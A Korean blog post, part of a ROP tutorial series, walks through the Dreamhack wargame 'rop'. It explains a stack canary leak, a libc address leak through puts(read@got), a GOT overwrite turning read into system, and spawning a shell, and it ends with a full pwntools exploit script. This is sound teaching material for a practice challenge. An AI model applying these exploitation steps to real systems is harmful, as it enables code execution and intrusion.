[ROP 시리즈 (4)] 드림핵(Dreamhack) - rop

🔁ROP 시리즈🔁

[ROP 시리즈 (1)] 라이브러리와 링크

[ROP 시리즈 (2)] PLT, GOT

[ROP 시리즈 (3)] Return to Library 개념 및 실습

[ROP 시리즈 (4)] 드림핵(Dreamhack) - rop <-여기!

 

---

 

이번 워게임은 아래 내용의 심화 버전이다. 아래 워게임을 아직 풀지 않았거나 풀이 방법을 모른다면 아래 포스트를 먼저 참고하고 오면 이번 포스트의 이해가 더 쉬울 것이다.

[드림핵(Dreamhack)] Return to Library 개념 및 실습

 

문제 분석

 
문제 코드

// Name: rop.c
// Compile: gcc -o rop rop.c -fno-PIE -no-pie

#include <stdio.h>
#include <unistd.h>

int main() {
  char buf[0x30];

  setvbuf(stdin, 0, _IONBF, 0);
  setvbuf(stdout, 0, _IONBF, 0);

  // Leak canary
  puts("[1] Leak Canary");
  printf("Buf: ");
  read(0, buf, 0x100);
  printf("Buf: %s\n", buf);

  // Do ROP
  puts("[2] Input ROP payload");
  printf("Buf: ");
  read(0, buf, 0x100);

  return 0;
}

문제 코드는 위와 같다. Return to Library 실습에서는 system함수가 이미 호출되어 system@plt를 쉽게 구할 수 있었고, "/bin/sh"가 데이터 세그먼트에 기록되어 ASLR의 영향을 받고 쉽게 접근할 수 있었다.
하지만 이번 문제에서는 1)system함수가 호출되지 않아 plt에 등록되어 있지 않고, 2)"/bin/sh" 또한 선언되지 않았다.
 

❗︎ 따라서 우리는 system함수의 주소를 직접 구해야하고, "/bin/sh" 문자열을 다른 방법으로 사용해야 한다. ❗︎

 
카나리 우회나 버퍼오버플로우를 유발하는 것은 여태껏 계속 해왔던 것이니 생략하겠다. 해당 부분은 이전 포스트를 참고해주길 바란다.
 
 

system 함수의 주소 구하기

0. 상황 분석

❓ 현재 상황 : plt에 system이 없음 (plt에 적히려면 일단 프로그램에서 호출되어야함!!)

함수와 관련된 주소는 함수@plt, 함수@got, 함수의 실제주소 이 세가지이다. 그렇다면 우리는 어떻게 system함수의 주소에 접근해야할까?
 
먼저, 우리는 system함수의 plt를 구할 수 없다. 왜냐하면 호출되어야지만 plt에 등록이 되기 때문이다.
우리가 서버에서 실행되는 프로세스 코드를 수정할 수 없으므로 system의 plt, 그리고 system의 got은 구할 수 없다. 왜냐하면 존재하지 않기 때문이다.
따라서 우리가 구할 수있는 것은 system의 실제 주소 뿐이다. 
 

이제 우리의 목표는 "system의 실제 주소를 얻어내기"로 범위가 좁혀졌다.

 
그렇다면 system의 실제주소를 접근할 수 있는 방법은 정녕 없을까...? 여기서 우리가 생각해야할 개념이 있다!

- ASLR가 적용되었을 때(하지만 PIE는 안 적용되어있을 때)는 '코드 영역'과 '데이터 영역'의 주소는 랜덤화되지 않는다.
- 어떤 함수가 프로그램 상에 존재할 때, 링크 과정에서 그 함수가 포함된 '라이브러리 전체'를 메모리에 로드한다.
- ASLR가 적용되어있어도 라이브러리 내의 오프셋(Offset)은 일정하다.

💡 2,3번 째 개념에 의해 system함수의 라이브러리에 속한 다른 함수의 실제 주소를 구한다면 거기서 오프셋을 빼서 system함수의 실제 주소를 구할 수 있다. 오프셋은 라이브러리가 같으면 동일하므로 어떤 라이브러리 종류만 알 수 있다면 우리집 마당에서도 구할 수 있다. 문제 코드의 read함수는 system함수와 같은 라이브러리에 속해 있다. 따라서 read함수의 실제 주소를 구하자.
💡read함수의 실제 주소는 어떻게 구하는가? read@got이 참고하는 값을 구하면 된다. 그런데.. 우리 집에서의 read@got와 드림핵 서버에서의 read@got 주소가 동일할까? 놀랍게도 동일하다! 왜냐하면 ASLR이 적용되어있고 PIE가 적용되어있지 않은 경우, 첫번째 개념에 의해 코드 세그먼트와 데이터 세그먼트의 주소는 변하지 않는다. 그런데 plt는 코드 덩어리이므로 코드 세그먼트에 저장되고, got는 전역 데이터이므로 데이터 세그먼트에 저장된다. 따라서 plt와 got를 우리 컴퓨터에서도 구할 수 있다. system주소와 read주소의 오프셋도 동일하기 때문에 쉽게 구할 수 있다.
 

1. read@got구하기 ->
2. read@got이 참조하는 값, 즉 read의 실제 주소 찾기(얘는 랜덤한 값이다.) ->
3. 미리 구한 오프셋으로 system함수 실제 주소 찾기

 
이 순서로 하나하나 가면 된다.
 

1. read@got 구하기

e = ELF("./rop")
read_got=e.got["read"] #정수로 반환되므로 페이로드로 보낼 때는 바이트로 바꿔야 함

ELF 객체는 익스플로잇에 필요한 ELF 정보를 출력해준다. 
 

2. read의 실제 주소 찾기

 
read의 실제주소는 랜덤하기 때문에 실행때마다 그 주소가 달라진다. 따라서 우리는 이를 런타임 중에 얘를 가져와야한다! 이를 위해 우리는 puts함수를 통해 화면에 출력해주도록 코드를 조작할 것이다.
우리는 puts(read_got)을 실행시킬 예정이다. 이를 위해 우리는 리턴 가젯을 이용한다.
 
⚠실수주의⚠  puts(read_got)한다고 read_got이 화면에 출력되는게 아니다.. puts안에는 문자열의 주소가 들어가고, read_got은 실주소를 가리키는 주소기 때문에 read_got이 가리키는 값, 즉 read의 찐 주소가 출력된다.
 
❗︎ 따라서 스택을 pop rdi;ret | read_got | puts_plt 로 구성한다. 
❗︎ 참고로 plt를 알면 그냥 함수를 실행시킬 수있는 것과 다름없다고 보면 된다.
 
이렇게 하면 우리의 화면에 read의 실제 주소가 출력될 것이다.
이를 recv로 받자

read_addr=u64(p.recvn(6)+b"\x00"*2)

왜 6글자만 받았냐면, 64bit 바이너리의 '라이브러리 주소'는 보통 7f로 시작하고 6글자이기 때문이다.
 
참고로 아래처럼 구할 수도 있다. (드림핵 Q&A 참고)

 read_addr=u64(p.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
 #7f올 때까지 받고, 뒤에서 6번째 자리부터 끝까지만 저장
 #그후 왼쪽 정렬하는데 빈부분은 \x00으로 채움(그래서 오른쪽 두바이트가 \x00\x00이 됨)

 
그리고 이를 통해 system함수를 구한다.
그러기 위해서는 offset을 먼저 알아야한다. offset은 위에서 언급했듯 라이브러리가 동일하면 다 동일하기 때문에 아래와 같이 구하면 된다.

#offset구하기
lib=ELF("./libc-2.27.so")
sys_read=lib.symbols["system"]-lib.symbols["read"] #symbols["함수이름"] 하면 함수의 주소를 출력해준다

#system함수 실제 주소 구하기
system=read_addr+sys_read

 
 

"/bin/sh" 넣기 및 총 익스플로잇 정리

여기까지하면 많이 따라왔다...수고했어요....다들..
그런데 페이로드를 날릴 때 맨처음에는 우리가 system함수를 모르기 때문에 이를 구하는 페이로드를 구해야하고, 다시 system함수를 이용한 페이로드를 날려야한다. 그런데 우리는 카나리 릭할 때 보내는 페이로드를 제외하면 기회가 한번밖에 없다. 따라서 우리는 기회를 스스로 만들어야 한다.
이를 위해 우리는 read함수를 한 번 더 실행시켜주도록 만들어서 system 함수의 주소를 다시 보낼 수 있게 할 것이다.
그러기 위해 또 리턴 가젯을 이용할 것이다.
 
우리는 read(0,read_got,0x10)을 실행되게 만들어서 read_got 주소에 system 주소를 덮어 씌울 것이다.
이를 위해 페이로드를 구성하면 pop_rdi | 0 | pop_rsi_r15 | read_got | 0 | read_plt 이다,
 
 
여기서 궁금한게 있을 텐데, 얘네들은 내가 풀어보면서 궁금했던 것이었다... (나만 궁금했으면 뭐..)

1. pop_rsi_r15는 뭔가요? -> pop rsi; pop r15; ret의 약자이다. 이를 통해 rsi에 read_got을 넣어준다. pop 15도 있으므로 뒤에 그냥 0을 넣어줘서 pop하게 해줬다

2. pop rdx는 안 하나요? -> 원칙상으로는 해야하는데 pop rdx를 하는 가젯을 찾기 어렵다. 이를 위해서는 다른 복잡한 방법이 있는데 이는 다음에 설명하도록 하겠다. 문제에서는 rdx가 충분히 크게 설정되어있기 때문에 다행히도 pop rdx해도 정상적으로 작동하기는 한다.

3. 왜 그 많고 많은 주소 중에 read_got을 overwrite하나요? -> read의 두번째 인자로는 system의 주소를 '가리킬' 애를 넣어야하는데, 이 가리킬 포인터를 찾기가 그렇게 쉬워보이지 않다(내 추측)

 
여기까지 하면 서버에서 read(0,read_got,0x10)를 실행하게 된다. 따라서 우리가 이제 read_got에 overwrite해줄 주소, 즉 system함수의 주소를 보내줘야한다. 

p.send(p64(system))

 
우리는 이제 read의 got을 system함수를 가리키게 해놨으므로 system("/bin/sh")대신 read("/bin/sh")를 실행하면 된다."/bin/sh"는 그냥 버퍼에 적어줄 것인데 위에서 read함수로 read_got에 우리의 입력을 받게 설정해놓았으므로 그냥 그 뒤에(read_got+0x8)에 "/bin/sh"를 넣어주자. 그러기 위해서는 좀전의 코드를 다음과 같이 수정해주자.

p.send(p64(system)+b"/bin/sh\x00") #혹시 몰라 맨 뒤에 null 문자도 추가해 주었다.

 
그리고 read("/bin/sh")를 실행할 수 있게 페이로드를 구성하면 pop_rdi | read_got+0x8 | read_plt 과 같다.
 
그래서 지금까지의 페이로드를 다 이어붙이면 아래와 같다.

열심히 아이패드로 그린 그림...... 이렇게 하나하나 손으로 그려보고 분석하면 좋다

 
참고로 내가 또 궁금했던게 있는데...

그러니까 왜 puts_plt다음에 바로 시스템(”/bin/sh”)을 해주지 않는거냐면 일단 system함수의 주소를 보내야하는데, 그거를 페이로드 보내기 전까지 알수가 없다….. 그래서 다시 read함수를 실행시켜서 이를 저장하게 하는 것이다

 
 

최종코드

정리해서 최종 코드는 아래와 같다.

from pwn import *

def slog(name, addr):
	return success(": ".join([name, hex(addr)]))

p = remote("host1.dreamhack.games", 9826)
e = ELF("./rop") #여기서 plt, got주소 가져올 것임 (얘네는 pie안적용하면 고정!)
#여기서 plt,got 필요한 이유는 함수실행위해서(plt), got overwrite하기 위해서
libc = ELF("./libc-2.27.so") #여기서 오프셋 구할 거임 (얘는 aslr되어도 고정이니까!)
#offset알면 read got이 가리키는 값+offset해서 system 함수의 찐 위치 알 수 있음

# [1] Leak canary
buf = b"A"*0x39 #버퍼 채워주기
p.sendafter("Buf: ", buf)
p.recvuntil(buf)
cnry = u64(b"\x00"+p.recvn(7)) #버퍼뒤 7자받고 맨 앞에 /x00추가해줌~
slog("canary", cnry)

# [2] Exploit
read_plt = e.plt['read'] #read plt주소 e에서 가져옴
read_got = e.got['read'] 
puts_plt = e.plt['puts']
pop_rdi = 0x00000000004007f3 #가젯 찾기
pop_rsi_r15 = 0x00000000004007f1 #가젯 찾기
payload = b"A"*0x38 + p64(cnry) + b"B"*0x8 #버퍼+카나리+sfp

# puts(read_got)
payload += p64(pop_rdi) + p64(read_got) #rdi=read_got 대입
payload += p64(puts_plt) #puts(read_got)

# read(0, read_got, 0x10)
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi_r15) + p64(read_got) + p64(0)
payload += p64(read_plt)

# read("/bin/sh") == system("/bin/sh")
payload += p64(pop_rdi)
payload += p64(read_got+0x8)
payload += p64(read_plt)

p.sendafter("Buf: ", payload) #이거 보내면 순차적으로 puts(read_got), read(0,read_got,rdx) 실행되고 stdin에 뭐 나올때까지 대기
read = u64(p.recvn(6)+b"\x00"*2) #일단 read_got 받기
lb = read - libc.symbols["read"]
system = lb + libc.symbols["system"] #system 주소 구해용
slog("read", read)
slog("libc base", lb)
slog("system", system)

p.send(p64(system)+b"/bin/sh\x00") #read(0,read_got,rdx) 대기타고있는 곳에 system 주소랑 /bin/sh 적어줌
#이후 남은 read("/bin/sh"), 즉 system("/bin/sh")실행됨
p.interactive() #쉘 획득

 
이렇게 하면 쉘을 획득할 수 있다...
 
문제를 풀 때 코드랑 페이로드랑 섞여서 순서가 조금 헷갈릴텐데, 꿀팁은 우리가 가젯으로 실행시킬 함수들을 그냥 문제 소스 코드에서 순서대로 붙이면 그래도 덜 헷갈린다.